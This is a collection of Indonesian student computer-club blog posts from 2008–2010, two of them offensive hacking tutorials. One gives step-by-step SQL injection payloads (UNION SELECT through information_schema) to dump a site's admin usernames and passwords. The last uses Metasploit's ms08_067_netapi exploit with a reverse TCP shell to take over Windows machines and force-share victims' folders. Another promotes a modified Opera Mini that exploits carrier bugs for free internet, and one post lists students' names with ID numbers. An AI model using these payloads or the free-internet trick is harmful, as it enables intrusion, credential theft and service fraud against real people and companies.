Thursday, February 25, 2010

Teknik SQL Injection

Pengertian sql injection:
SQL Injection (injeksi SQL) adalah sebuah teknik dalam web hacking yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan database sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter tertentu yang tertulis dalam pernyataan SQL atau masukan pengguna tidak bertipe data yang kuat. Akibatnya ketika dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain.

Teknis SQL injection yang perlu di ketahui sebelumnya pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: target.com/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
Code:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100

sehingga muncul pesan error seperti berikut (masih banyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:
Code:
[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:
Code:
[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


===========
=step Empat:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema =database() >>> dimasukan setelah angka terakhir

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name), 6,7,8+from+information_schema.tables+where+table_s chema=database()--

=============
= step Lima: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name= 0xhexa-- >>> dimasukan setelah angka terakhir

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :http://soai.forumotion.com/ascii-h1.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0x61646D696E--

============
=step Enam:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,usernam e,password),6,7,8+from+admin--


-->


Friday, December 4, 2009

PENGUMUMAN PESERTA YANG LULUS SEBAGAI CALON ANGGOTA - EXTRACT AND SETUP 02

Sesuai Keputusan Rapat Badan Pengurus Harian COCONUT AMIK Profesional mengenai Daftar Peserta yang lulus seleksi, maka kami menetapkan nama berikut ini sebagai calon anggota COCONUT Computer Club angkatan 02, Extract And Setup :


1. Syaifullah /11082061/TK
2. Hamsal /1108089/MI
3. Hardianti /12091156/MI
4. I Wayan Sudirman /12091165/MI
5. Ikhiar Muttasalihin /12092052/TK
6. Moch Ridwan Agung R (12091001-MI)
7. Yusrianto Yunus (10072030-TK)
8. Yaomal (11082031-TK)
9. Bulandari (12093021-KA)
10. Artha Kusuma (11082012-TK)
11. Musdayanti /12093048/KA
12. Roby/12092058/TK
13. Muh. Ahkam Ali/12092095/TK
14. Afzalurrahman/12090213/TK
15. Hardianti Dwi Oktaviani/12091168/MI
16. Takbir/10072137/TK
17. Ilham Rahmat A/11081180/MI
18. Mujaddid/12092136/TK
19. Ervin Ibrahim/12091134/MI
20. Istifarni Y/12091004/MI
21. Riswadi/12092133/TK
22. Muh. Ikhsan Irmansyah/12092142/TK
23. Doni Darmawan/12092045/TK
24. Victor Mual/12092149/TK
25. M. Amir Abdullah/1209077/MI
26. Sitti Hadijah/12091038/MI
27. Imam Nugraha /12092055/TK
28. Aswinda /12091123/ MI
29. Indah Putri Djawahir /12091127/MI
30. Jaelani Abdullah /12091047/MI
31. Ahmad Sopandi /11082059/TK.

Nama - nama diatas diharapkan berkumpul pada hari minggu 6 Desember 2009 Pukul 13.00 di sekretariat COCONUT Computer Club, Perumahan Anggrek Blok TM III/8.

Dan memohon Maaf yang sebesar-besarnya kepada seluruh peserta EXTRACT AND SETUP yang belum bisa bergabung sebagai Calon anggota COCONUT Computer Club apabila ada sikap dan tingkah laku dari kami sebagai panitia yang kurang berkenang dihati sodara sekalian. mudah-mudahan ini tidak menghentikan langkah sodara untuk berhenti belajar, sebab COCONUT bukanlah satu-satunya tempat untuk anda belajar. Jadikanlah Setiap Orang yang anda jumpai adalah gurumu dan setiap tempat yang anda datangi adalah sekolahmu. Kami Masih tunggu anda dipenerimaan selanjutnya. Thank's and salam teknologi.

Friday, October 2, 2009

Internet Gratis VIA Handphone

Internet di Indonesia memang tergolong sesuatu yang mahal tentunya semua orang berharap bisa mendapatkan akses internet murah bahkan gratis. Tentunya anda belum percaya kalau anda belum membuktikan sendiri bahwa tips yang kami berikan ini benar-benar internet gratis. Tapi sayangnya tidak semua orang bisa menikmati internet gratis ini karena yang bisa menikmati internet gratis ini adapun syaratnya yaitu :

1. Pengguna Indosat (Berhasil di uji cobakan pada kartu Im3 kartu lain silahkan anda coba sendiri)

2. Internet gratis ini hanya bisa di akses melalui Hand Phone atau ponsel. Ponsel yang dipakai ber merk Nokia, Sony Ericson versi baru setara dengan versi K dan W. Misal K700, K750, K60i, K800, w550i,W660 dan sejenis yang sudah suport di instal aplikasi Opera min versi jar.

3. Menggunakan aplikasi opera mini yang sudah di modifikasi (Opera mini modif OM4 Indosat)

Yang belum pernah menggunakan Aplikasi Opera mini boleh dicoba fasilitas yang dimiliki Opera mini, disamping kecepatan loading nya tampilan nya yang oke setara Aplikasi Opera pada PC (tergantung keadaan speed gprs Indosat yang fluktuatif) , terlebih dengan memanfaatkan Aplikasi Opera mini yang sudah di modifikasi (OM4 Indosat) kita bisa mengakses internet yang benar benar gratis / free / pulsa kita tidak akan terpotong. Silahkan buktikan sendiri . Cuman satu kekurangannya yaitu dekstopnya karena menggunakan layar LCD ponsel yang kecil tersebut.

Anda dapat mendownload Aplikasi Opera mini yang sudah di modifikasi di link di bawah ini :

1. Opera Mini Modif ESC Versi Indonesia

http://www.4shared.com/file/136688097/42fa2853/OM_Modif_ESC-creation_Indonesia_version.html

Sebenarnya Aplikasi Opera mini ini memanfaatkan Bugs-Bugs yang masih pada server Indosat. Sayangnya Internet gratis ini tidak bisa gunakan untuk akses internet melalui PC atau Komputer. Semoga Ya kita berharap Meski indosat sudah mengetahui hal ini agar tidak memblokir trick ini hitung hitung sebagai bantuan kepada Pengguna Indosat hitung hitung ber amal dan demi kemajuan bangsa indonesia terutama di bidang internet dan teknologi informasi he..he..Makasih sebelumnya Pak Boss Indosat…!!

Info Tambahan seputar setting GPRS Indosat
Sebenarnya banyak configurasi gprs yang bisa kita gunakan Untuk mengakses internet dari indosat. Berikut di bawah ini configurasi gprs untuk Indosat yang bisa dipakai yaitu :
Setting untuk paket data yaitu tarif gprs nya + Rp. 1.1,- per 1 Kb bila kita menggunakan opera mini standart / pc , bila kita menggunakan Opera mini modifikasi ( OM4 Indosat ) tetap gratis / pulsa kita tidak kepotong.

Berikut ini Seting Komunikasi data Pada Ponsel, gunakanlah salah satu untuk setting gprs Indosat sesuai dengan Ponsel / Hp anda masing – masing :

Setting GPRS Indosat 1
APN: indosatgprs
IP: 010.019.019.019
user name: indosat
pasword::indosat

Setting GPRS Indosat 2
APN : www.indosat-m3.net
IP : 010.019.019.019
User Name .: gprs
Pasword : im3

Setting GPRS Indosat 3
APN -: indosat3g
IP : 010.019.019.019
User Name dan Password Dikosongkan khusus Jaringan 3 Ginternet, gratis, facebook, browsing, update status, handphone

By: Admin Cyber net (semoga bermanfaat)

Sunday, September 20, 2009

SELAMAT HARI RAYA IDUL FITRI


Segenap Keluarga kecil COCONUT Computer Club AMIK Profesional mengucapkan Minal Aidin Wal Faidzin, Mohon Maaf Lahir Batin kepada seluruh pihak yang pernah merasa di lukai, disakiti dan di hantui..hahahahhahah.. bercandaaa.... maaf atas segala sikap, kata, yang membuat kalian semua pilu.... mohon maaf yg sebesar-besarnya yahhhh.... upzz... jgn lupa ketupat dan opor ayamnya ditungguuu yeeeee.....

Monday, March 16, 2009

KELEMAHAN WINDOWS YANG BERGUNA.

KELEMAHAN WINDOWS YANG BERGUNA.
By Oghie

Pernahkah anda berpikir bahwa Microsoft Windows mempunyai sebuah kelamahan yang dapat berguna untuk mengamankan data, baik dari serangan virus maupun dari tangan orang-orang tidak bertanggung jawab. Sebulan yang lalu sebelum saya menulis artikel ini, saya hendak menyimpan data tugas Hardware kampus kedalam flashdisk. Dikarenakan tugasnya membahas menganai port Mainboard, maka saya membuat sebuah folder di drive D:\ dengan nama COM1, dan hasilnya folder tersebut tidak dapat dibuat. Kemudian saya mencoba lagi membuatnya dengan nama yang berbeda yaitu COM2, namun tak juga bisa, yang ada Cuma folder akan kembali secara otomatis dengan nama “New Folder”. Saya kemudian penasaran, mencoba dari COM3 dan seterusnya. Hasilnya baru setelah di COM10, folder tersebut terbentuk (COM1 sampai COM9 gagal terbentuk).


Belum putus asa, saya akhirnya mencoba memaksakan diri untuk membuat folder tersebut (COM1) dengan masuk di Command Prompt. Seperti biasanya saya menggunakan perintah MD untuk membuat direktori. Lengakapnya D:\Md COM1 (Enter). Hasilnya muncul pesan The Directory Name Is Invalid. Alias folder tidak berhasil terbentuk.
Kemudian saya mencoba dengan perintah lain untuk membuat direktori tersebut, yaitu D:\mkdir com1, tapi hasilnya tetap saja tidak bisa.

Setelah merenung begitu lama, Akhirnya saya mencoba membuatnya dengan perintah kuno, yaitu D:\mkdir .\com1.\ dan berhasil.


Tapi folder tersebut tidak dapat di Delete, di Rename, di Copy dan dipindahkan. Kecuali setelah saya memformat flashdisk saya, baru folder tersebut dapat terhapus.



Dari sini saya kemudian memamfaatkan kelemahan ini, yaitu dengan mengamankan/mengcopy seluruh data penting saya kedalam folder tersebut. Hasilnya berbagai macam virus yang mencoba mengganggu data saya tak mampu mengaksesnya (Data tetap untuh). Dan yang sering terjadi belakangan ini, kebanyakan virus mencoba menyembunyikan folder didalam flahdisk dan tak jarang pula menyembunyikan folder di harddisk. Tetapi dengan pembuatan folder tersebut, virus tak mampu mengubah attribut pada folder itu (tak mampu menyembunyikan).


*catatan
Selain COM1 sampai COM9, ada beberapa nama folder yang demikian, misalnya: CON, NUL, PRN, AUX, LPT1 sampai LPT9. Penyebabnya mungkin saja nama-nama folder tersebut merupakan bagian port hardware yang tidak sengaja ditulis oleh Microsoft kedalam source code Sistem Operasi Windows. Mungkin Saja!!!.

COM1 sampai 9 :First serial communications port
CON : Keyboard and display
PRN :System list device, usually a parallel port
AUX :Auxiliary device, usually a serial port
NUL :Bit-bucket device
LPT1 sampai 9 :parallel printer port.


-=gREEts=-: All crew COCONUT, HIMATEK AMIK Profesional Mks Angk 2003,  iLhye, boy, aLX, jinKur, anwr, chalk, john, cncu, anie, R-ni, imhe, dll yg nggk disebutin, CMOS, TSC. Uppz ampir lupa.

Sunday, January 11, 2009

MENGAMBIL ALIH KOMPUTER TARGET DALAM JARINGAN


MENGAMBIL ALIH KOMPUTER TARGET DALAM JARINGAN
(Win XP SP2, SP3, Win 2003, Win Vista). By: OGHIE

Ho ho ho, akhirnya setalah istirahat panjang selama 3 tahun dari dunia IT, gue akhirnya kembali lagi. Kalau dalam film superhero “BATMAN RETURN”, no no… bukan BATMAN RETURN tapi oghie Return. Sekembali gue dari dunia Entertaintmen (bukan artis lho) banyak buanget perubahan yang berarti di dunia IT, termasuk hacking. Kalau dijaman gue dulu, terakhir gue sempat menggunakan Windows XP Sp1 yang terdapat banyak sekali kelemahan. Namun sekarang gue lihat bapak Bill Gates udah ngeluarin pamungkas barunya yang begitu megah yaitu Windows Pisang… Uppss bukan Pisang tapi Windows Vista. He he he. Belum lagi XP udah di patch kelemahannya hingga Service Pack 3. Tapi tetap saja mempunyai vulnerability. Mau bukti…?, ok ok kita to the point aje.
Kali ini teknik yang kita gunakan yaitu teknik Exploit dengan Menggunakan Metasploit. Dan Yang perlu kamu siapkan pada sesi kali ini yaitu:
Jika diatas telah terpenuhi, sekarang kamu jalankan Program Metasploit 3.2, tepatnya kamu pilih Metasploit 3 Web (lihat gambar).
Tunggu beberapa saat,(sabar yach) Setelah itu akan tampil seperti gambar dibawah ini:

Jika udah tampil loe pilih menu Console. Maka akan tampil jendela seperti berikut:

Ketikkan perintah show exploits kemudian tekan Enter

Maka akan tampil Modul exploit seperti beirkut:

Kemudian pilih modul exploit untuk kelemahan pada Netapi32, caranya dengan mengetikkan :
use windows/smb/ms08_067_netapi kemudian Enter
Kemudian pilih jenis payload. Kali ini kita pilih payload yang akan menghubungkan shell komputer target dengan komputer penyerang melalui TCP. Caranya dengan mengetikkan perintah:
set payload windows/shell/reverse_tcp (kemudian Enter)
Kemudian masukkan IP Address kamu, dengan cara mengetikkan perintah :
set LHOST 192.168.0.17 Enter <----- contoh="" dengan="" gue.="" ip="" o:p="">
Kemudian masukkan IP Address target kamu, dengan cara mengetikkan perintah :
set RHOST 192.168.0.16 Enter <----- contoh="" dengan="" gue.="" o:p="" target="">
Semuanya udah siap…? Siap…!!! Ready!!! 1….2….3… tunggu dulu bro, ketik dulu instruksi/perintah exploit kemudian tekan Enter.
Tedennnnggggg!!! Abrakadabra!!!, sistem target telah diambil alih

Sekarang kita telah berada di direktori c:\windows\system32 sang target. Akses penuh telah ditangan. Selanjutnya tinggal kreatifitas kalian. Untuk mengintip data pada komputer target, silahkan jalankan perintah MS DOS. Sebagai contoh, kita akan menuju drive “D” korban, dengan mengetikkan perintah >> d: Enter. Kemudian lakukan perintah DIR untuk melihat isi data drive D komputer korban.
Untuk mengambil data pada komputer korban, kita akan melakukan sharing paksa dari komputer korban dengan menjalankan perintah.
net share namafolder=d:\lokasifolder /UNLIMITED kemudian enter. Lihat gambar dibawah ini:
Kemudian masuk pada windows Explorer, lalu ketikkan pada Address Bar \\Alamat IP target\namafolder yang telah dishare paksa. Contoh:

Dan masih banyak lagi yang bisa kamu lakukan jika telah melakukan Remote Exploit (Eksploitasi Jarak Jauh) pada komputer target. Sekian dari saya, untuk ngomel-ngomelnya silahkan E-Mail atau YM di oghie_thecharacter
*penulis tidak bertanggungjawab atas segala penyalahgunaan isi artikel ini.
Makassar, Desember 2008.
-=gREEts=-: metasploit.org, All crew COCONUT, HIMATEK AMIK Profesional Mks Angk 2003, boy, aLX, jinKur, aNwr, chALk, jHn, cNcu, aNie, R-ni, iMhe, dll yg ngg disebutin, CMOS, TSC. Uppz ampir lupa. 

Thursday, December 25, 2008